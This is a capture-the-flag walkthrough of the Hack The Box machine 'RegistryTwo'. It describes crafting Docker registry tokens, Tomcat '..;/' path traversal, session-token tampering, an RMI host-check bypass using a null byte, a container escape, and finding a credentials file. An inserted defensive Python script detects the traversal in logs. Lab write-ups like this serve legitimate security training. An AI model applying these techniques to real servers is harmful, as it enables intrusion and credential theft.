RegistryTwo - HTB
https://app.hackthebox.com/machines/552
Last updated
First of all, I won't go into deep detail for every step. Sometimes I'll skip certain aspects, but my focus will be on delivering the exploit, the vulnerability, and how to exploit them efficiently. This will be a quick and concise writeup.
First, let's start with port 5001.
By fuzzing the web directories, we can find /auth.
You can refer back to the Docker registry documentation HERE for further details.
Specifically, HERE tells you what to do with the token, but it first requires more modifications in order to access the Docker registry image and pull it.
As per the documentation, we also need:
To craft your own token, we used this added URL scope, as the documentation suggests, to access _catalog:
https://webhosting.htb:5001/auth?service=Docker%20registry&scope=registry:catalog:*
Craft another token to get the hosting-app image information:
https://webhosting.htb:5001/auth?service=Docker%20registry&scope=repository:hosting-app:pull
Reading the image information gives you a clue about which web app they are using, and a lot of other information to help find your way to the user foothold.
Now we move to port 443.
Register a new user, then log in.
As we learned earlier, they are using Tomcat v9.0.2; referring to HERE, we find that the website is vulnerable to path traversal (..;/).
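As an added example that is not part of the original writeup, here is a small Python detector a defender could run over Tomcat access logs to spot the ..;/ path-parameter trick mentioned above; the log lines are constructed for the example, not taken from the box.

```python
"""Flag Tomcat path-parameter traversal (..;/) in access-log lines."""
import re
from urllib.parse import unquote

# Common log format as written by Tomcat's AccessLogValve (pattern "common").
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+)$'
)

# Constructed sample lines (not from the box): one benign, two traversal attempts.
SAMPLE_LOG = """\
10.10.14.5 - - [01/Jan/2024:10:00:01 +0000] "GET /hosting/index.jsp HTTP/1.1" 200 512
10.10.14.5 - - [01/Jan/2024:10:00:02 +0000] "GET /hosting/..;/manager/html HTTP/1.1" 401 0
10.10.14.5 - - [01/Jan/2024:10:00:03 +0000] "GET /hosting/%2e%2e%3b/examples/ HTTP/1.1" 200 2048
"""

def is_path_param_traversal(raw_path: str) -> bool:
    """True when a segment is '..' followed by a ';' path parameter. Tomcat strips
    the ';param' part before mapping, so '/a/..;/b' resolves to '/b' and slips past
    front-end rules that only match on '/a/...'. Decoded once to catch %2e / %3b."""
    path = unquote(raw_path.split("?", 1)[0])
    return any(seg.startswith("..;") for seg in path.split("/"))

def find_traversal_attempts(log_text: str) -> list:
    """Return (ip, raw_path, resolved_path, status) for each flagged line."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or not is_path_param_traversal(m["path"]):
            continue
        # Resolve as Tomcat would: drop ';param' from each segment, then collapse '..'.
        segs = []
        for seg in unquote(m["path"].split("?", 1)[0]).split("/"):
            seg = seg.split(";", 1)[0]
            if seg == "..":
                if segs:
                    segs.pop()
            elif seg:
                segs.append(seg)
        hits.append((m["ip"], m["path"], "/" + "/".join(segs), int(m["status"])))
    return hits

if __name__ == "__main__":
    for ip, raw, resolved, status in find_traversal_attempts(SAMPLE_LOG):
        print(f"{ip} requested {raw!r} -> resolves to {resolved!r} (HTTP {status})")
```

The resolved path shows which servlet (manager, examples) the request actually reached, which is the value worth alerting on.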
Now we are able to access the application manager.
Now we are able to access the example scripts, in which we can modify session tokens to access otherwise unavailable things.
As you can see (s_EditingMedia_{tmpID}), you can get {tmpID} by creating a domain, then trying to write/edit the file index.html or any created file.
I have automated the process with this simple Python script:
Just make sure to change {cookie} and {tmpID} to yours. After you get a successful response, you can refresh the tmpID page to see the file. Also note that you are able to modify the file with whatever you want if you have write access to it.
Now we can get the hosting.war that we found in the Docker registry image we pulled earlier.
View the web page source and scroll down to ' value=atob(`{BASE64}`).
Extract just the {BASE64} content, remove the rest, and use base64 -d to write it to a hosting.war file.
After reading the source code, we know we can set the manager role.
Adding &rmi.host={ip} and %00.htb bypasses the check.
Now we have to request anything through our created domain to trigger the RMI connection.
I used the ermir tool. Make sure your current Java version is 11 in order for the payload and exploit to work; you can use the commands below to list/change your Java version:
After enumeration, we can interact with the RMI server again to escape the Docker container.
You will find all the tools used in my repository.
I brute-forced the developer folder using SecLists/Discovery/Web-Content/dirsearch.txt
and found a hidden file containing credentials.